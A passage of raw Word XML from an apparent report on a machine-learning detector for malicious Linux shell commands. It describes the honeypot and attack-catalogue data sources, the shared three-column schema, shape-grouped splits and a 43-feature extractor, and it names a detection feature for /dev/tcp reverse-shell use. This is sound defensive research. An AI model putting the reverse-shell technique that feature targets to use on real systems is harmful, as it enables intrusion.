      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>styles diverge, a decision boundary tuned to Dataset 1's shell-interpreter cue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>has little reason to fire on Dataset 2's LotL-binary cue, and vice versa. This</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>divergence at the very top of the gain ranking is the early warning sign for the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cross-dataset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>transfer collapse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> examined later: features that look powerful</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>in-distribution are, in large part, learned stylistic shortcuts that do not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>generalize across provenance boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5.1 — The Unified Feature Schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Every number in this section is measured against the current build. Sources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ingestion.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch3_feature_audit.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docs/DATA_CARD.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What has to be reconciled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The two corpora are not two samples of one population. Dataset 1 is assembled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>from published attack catalogues and a payload generator on the malicious side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(HackTricks, GTFOBins, Atomic Red Team, QuasarNix, SLP, InternalAllTheThings)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and from documentation and instruction corpora on the benign side (tldr,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>bash-instruct, nl2bash, LinLM, bash_command_6k). Dataset 2 is real capture on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>both sides: attacker input from Cowrie SSH honeypot sessions, benign input from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">harvested </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files and commandlinefu. They are 15,248 and 9,576</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rows, they share </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no source at all</w:t>
      </w:r>
      <w:r>
        <w:t>, their licences differ, and one is written</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>by people documenting commands while the other is typed by people running them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>What they do share is the artefact. Both, ultimately, are lists of Linux shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>command lines, and that is the level at which the project harmonises them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>One column, one contract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The unified representation is the raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> string. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ingestion.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">design </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the only dataset-aware module in the pipeline</w:t>
      </w:r>
      <w:r>
        <w:t>: it holds a registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>mapping a dataset name to its two CSVs, and it returns every corpus in one</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>enforced three-column schema —</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column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>the sole model input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>int ∈ {0,1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1 = malicious, provenance-derived</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">provenance tag, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>evaluation only, never an input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The loader coerces types, rejects empty command strings and rejects labels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">outside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{0,1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the way through, so a malformed corpus fails at load rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>than silently at fit time. Nothing downstream ever learns which dataset it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">reading — dataset names are banned from every other module in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/</w:t>
      </w:r>
      <w:r>
        <w:t>, including</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>in comments, and that ban is enforced by a test. The practical consequence is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the one the assignment asks for: a third corpus can be registered in one place</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and the entire pipeline runs on it unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Both datasets are additionally held to the same experimental protocol rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>than merely the same column names: 1 attack to 3 benign in each, an 80/20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">train/test split </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>grouped by command shape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so no structural near-duplicate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>straddles the split (verified: zero shape groups appear on both sides of either</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>split, in either label), and therefore the same do-nothing F1 floor of 0.400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>against which every score in this report is read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Why the schema is genuinely shared, and where it is not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A common column name is cheap. The substantive claim is that feature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the same thing in both corpora, and that holds here because the extractor is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>featurize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py:280</w:t>
      </w:r>
      <w:r>
        <w:t>) maps a command string to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the same 43 numbers through fixed regexes and fixed threat-mapped binary lists;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EngineeredFeatures.fit()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py:34</w:t>
      </w:r>
      <w:r>
        <w:t>) learns nothing at all and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exists as a transformer only so that a downstream </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StandardScaler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>component that fits fold-local statistics. No vocabulary, no quantile, no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">per-corpus constant is carried in. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the same predicate on a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>honeypot line as on a GTFOBins line, which is precisely what makes the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cross-dataset comparison of effect sizes and importances in Section 5.2 a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>comparison rather than a coincidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The honest qualification is that the hybrid model's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> representation does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">not have this property. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CharNgramFeatures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py:48</w:t>
      </w:r>
      <w:r>
        <w:t>, unioned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>build_hybrid_features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:75</w:t>
      </w:r>
      <w:r>
        <w:t>) fits a character n-gram TF-IDF vocabulary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on the training fold — correctly leakage-safe, but corpus-bound by construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Fitted separately on the two training splits at the same 3,000-feature cap, the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">two vocabularies share only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1,789 n-grams (Jaccard 0.425)</w:t>
      </w:r>
      <w:r>
        <w:t>: 40.4% of what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>each corpus considers its most informative character patterns has no counterpart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>in the other. The hybrid therefore carries one harmonised block and one</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>un-harmonisable one, and that asymmetry is the mechanism behind the transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>results in Chapter 8.2 — it is stated here rather than discovered there.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The selection protocol is the real harmonisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The strongest sense in which the two corpora are treated identically is not the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">schema but the way the feature set was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>chosen</w:t>
      </w:r>
      <w:r>
        <w:t>. Sixty-eight candidates were</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>proposed from the threat model in Chapter 1.2 and reduced to 43 by a single</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pre-registered gate, computed on each corpus's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>training split only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>applied to both without modification:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Mann–Whitney </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
